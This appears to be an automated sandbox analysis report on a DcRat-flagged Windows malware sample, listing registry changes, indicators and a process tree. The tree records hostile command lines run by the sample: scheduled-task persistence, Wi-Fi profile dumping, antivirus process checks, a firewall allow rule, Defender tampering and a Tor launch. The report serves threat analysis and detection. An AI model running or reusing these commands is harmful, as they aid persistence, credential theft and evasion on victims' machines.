64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	DE1D.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	DE1D.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	DE1D.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	DE1D.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2312	PING.EXE
4492	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
320	5ec7va3.exe
320	5ec7va3.exe
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
2688	6Yy4iK5.exe
2688	6Yy4iK5.exe
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE
3284	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3284	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
320	5ec7va3.exe
2776	toolspub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	2776	2jQ4524.exe
Token: SeSecurityPrivilege	4712	4qV643MX.exe
Token: SeDebugPrivilege	2688	6Yy4iK5.exe
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeDebugPrivilege	1936	DE1D.exe
Token: SeDebugPrivilege	2452	DD80.exe
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeDebugPrivilege	2760	DE1D.exe
Token: SeDebugPrivilege	956	tasklist.exe
Token: SeDebugPrivilege	1844	E003.exe
Token: SeDebugPrivilege	3916	tasklist.exe
Token: SeDebugPrivilege	4388	DC56.exe
Token: SeDebugPrivilege	1676	279E.exe
Token: SeDebugPrivilege	2452	279E.exe
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE
Token: SeCreatePagefilePrivilege	3284	Explorer.EXE
Token: SeShutdownPrivilege	3284	Explorer.EXE

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
4704	Ent.pif
3284	Explorer.EXE
3284	Explorer.EXE
4704	Ent.pif
4704	Ent.pif
3284	Explorer.EXE
3284	Explorer.EXE

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4704	Ent.pif
4704	Ent.pif
4704	Ent.pif

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1364	Broom.exe
2760	DE1D.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3284	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4304 wrote to memory of 2580	4304	8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe	87
PID 4304 wrote to memory of 2580	4304	8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe	87
PID 4304 wrote to memory of 2580	4304	8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe	87
PID 2580 wrote to memory of 4048	2580	qc0pE22.exe	89
PID 2580 wrote to memory of 4048	2580	qc0pE22.exe	89
PID 2580 wrote to memory of 4048	2580	qc0pE22.exe	89
PID 4048 wrote to memory of 2776	4048	CY9LV27.exe	90
PID 4048 wrote to memory of 2776	4048	CY9LV27.exe	90
PID 4048 wrote to memory of 2776	4048	CY9LV27.exe	90
PID 2776 wrote to memory of 3440	2776	2jQ4524.exe	93
PID 2776 wrote to memory of 3440	2776	2jQ4524.exe	93
PID 2776 wrote to memory of 3440	2776	2jQ4524.exe	93
PID 2776 wrote to memory of 3440	2776	2jQ4524.exe	93
PID 2776 wrote to memory of 3440	2776	2jQ4524.exe	93
PID 2776 wrote to memory of 3440	2776	2jQ4524.exe	93
PID 2776 wrote to memory of 3440	2776	2jQ4524.exe	93
PID 2776 wrote to memory of 3440	2776	2jQ4524.exe	93
PID 4048 wrote to memory of 4712	4048	CY9LV27.exe	94
PID 4048 wrote to memory of 4712	4048	CY9LV27.exe	94
PID 4048 wrote to memory of 4712	4048	CY9LV27.exe	94
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 4712 wrote to memory of 404	4712	4qV643MX.exe	96
PID 2580 wrote to memory of 320	2580	qc0pE22.exe	97
PID 2580 wrote to memory of 320	2580	qc0pE22.exe	97
PID 2580 wrote to memory of 320	2580	qc0pE22.exe	97
PID 4304 wrote to memory of 2688	4304	8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe	102
PID 4304 wrote to memory of 2688	4304	8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe	102
PID 4304 wrote to memory of 2688	4304	8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe	102
PID 3284 wrote to memory of 4388	3284	Explorer.EXE	108
PID 3284 wrote to memory of 4388	3284	Explorer.EXE	108
PID 3284 wrote to memory of 4388	3284	Explorer.EXE	108
PID 3284 wrote to memory of 2452	3284	Explorer.EXE	109
PID 3284 wrote to memory of 2452	3284	Explorer.EXE	109
PID 3284 wrote to memory of 1936	3284	Explorer.EXE	110
PID 3284 wrote to memory of 1936	3284	Explorer.EXE	110
PID 3284 wrote to memory of 1844	3284	Explorer.EXE	112
PID 3284 wrote to memory of 1844	3284	Explorer.EXE	112
PID 3284 wrote to memory of 1844	3284	Explorer.EXE	112
PID 3284 wrote to memory of 2448	3284	Explorer.EXE	113
PID 3284 wrote to memory of 2448	3284	Explorer.EXE	113
PID 3284 wrote to memory of 2448	3284	Explorer.EXE	113
PID 1936 wrote to memory of 472	1936	DE1D.exe	116
PID 1936 wrote to memory of 472	1936	DE1D.exe	116
PID 472 wrote to memory of 4148	472	cmd.exe	118
PID 472 wrote to memory of 4148	472	cmd.exe	118
PID 472 wrote to memory of 2312	472	cmd.exe	119
PID 472 wrote to memory of 2312	472	cmd.exe	119
PID 2448 wrote to memory of 3724	2448	E301.exe	120
PID 2448 wrote to memory of 3724	2448	E301.exe	120
PID 2448 wrote to memory of 3724	2448	E301.exe	120
PID 3724 wrote to memory of 2652	3724	cmd.exe	121
PID 3724 wrote to memory of 2652	3724	cmd.exe	121
PID 3724 wrote to memory of 2652	3724	cmd.exe	121
PID 472 wrote to memory of 3224	472	cmd.exe	122
PID 472 wrote to memory of 3224	472	cmd.exe	122
PID 472 wrote to memory of 2760	472	cmd.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DE1D.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	DE1D.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3284
- C:\Users\Admin\AppData\Local\Temp\8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe
  "C:\Users\Admin\AppData\Local\Temp\8f8ad283b107caad6d633c327f275570015810553c465b5db376637bc3f17779.exe"
  2⤵
  - DcRat
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4304
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\qc0pE22.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\qc0pE22.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2580
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\CY9LV27.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\CY9LV27.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4048
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2jQ4524.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2jQ4524.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2776
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:3440
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4qV643MX.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4qV643MX.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4712
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:404
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5ec7va3.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5ec7va3.exe
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:320
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Yy4iK5.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6Yy4iK5.exe
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Executes dropped EXE
    - Windows security modification
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- C:\Users\Admin\AppData\Local\Temp\DC56.exe
  C:\Users\Admin\AppData\Local\Temp\DC56.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4388
- C:\Users\Admin\AppData\Local\Temp\DD80.exe
  C:\Users\Admin\AppData\Local\Temp\DD80.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- C:\Users\Admin\AppData\Local\Temp\DE1D.exe
  C:\Users\Admin\AppData\Local\Temp\DE1D.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "DE1D" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\DE1D.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:472
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:4148
  - - C:\Windows\system32\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:2312
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "DE1D" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe" /rl HIGHEST /f
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:3224
  - - C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe
      "C:\Users\Admin\AppData\Local\WindowsSecurity\DE1D.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      outlook_office_path
      outlook_win_path
      PID:2760
    - - C:\Users\Admin\AppData\Local\ixas4a6gsv\tor\tor-real.exe
        
        "C:\Users\Admin\AppData\Local\ixas4a6gsv\tor\tor-real.exe" -f "C:\Users\Admin\AppData\Local\ixas4a6gsv\tor\torrc.txt"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2116
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
        5⤵
        
        PID:1848
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:2068
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        
        PID:2580
      - C:\Windows\system32\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        6⤵
        
        PID:4324
    - - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
        5⤵
        
        PID:1172
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        Executes dropped EXE
        
        PID:4776
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        6⤵
        
        PID:3092
      - C:\Windows\system32\findstr.exe
        
        findstr "SSID BSSID Signal"
        6⤵
        
        PID:3928
- C:\Users\Admin\AppData\Local\Temp\E003.exe
  C:\Users\Admin\AppData\Local\Temp\E003.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1844
- C:\Users\Admin\AppData\Local\Temp\E301.exe
  C:\Users\Admin\AppData\Local\Temp\E301.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Windows\SysWOW64\cmd.exe
    cmd /k cmd < Layers & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3724
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:2652
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        
        PID:4240
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:956
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3916
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe"
        5⤵
        
        PID:1168
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c mkdir 32511
        5⤵
        
        PID:2408
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Button + Offices + Participants + Foreign + String 32511\Ent.pif
        5⤵
        
        PID:3696
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Duncan + Wagon + Vagina 32511\b
        5⤵
        
        PID:1284
    - - C:\Users\Admin\AppData\Local\Temp\64906\32511\Ent.pif
        
        32511\Ent.pif 32511\b
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4704
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 localhost
        5⤵
        Runs ping.exe
        
        PID:4492
- C:\Users\Admin\AppData\Local\Temp\1945.exe
  C:\Users\Admin\AppData\Local\Temp\1945.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4160
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:3092
- C:\Users\Admin\AppData\Local\Temp\279E.exe
  C:\Users\Admin\AppData\Local\Temp\279E.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- - C:\Users\Admin\AppData\Local\Temp\279E.exe
    C:\Users\Admin\AppData\Local\Temp\279E.exe
    3⤵
    - Executes dropped EXE
    PID:2212
- - C:\Users\Admin\AppData\Local\Temp\279E.exe
    C:\Users\Admin\AppData\Local\Temp\279E.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2452
- C:\Users\Admin\AppData\Local\Temp\512F.exe
  C:\Users\Admin\AppData\Local\Temp\512F.exe
  2⤵
  PID:4776
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    - Executes dropped EXE
    PID:4604
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1364
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2884
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:2776
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:2624
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:652
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      PID:2700
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5072
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4924
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:224
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:3888
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3748
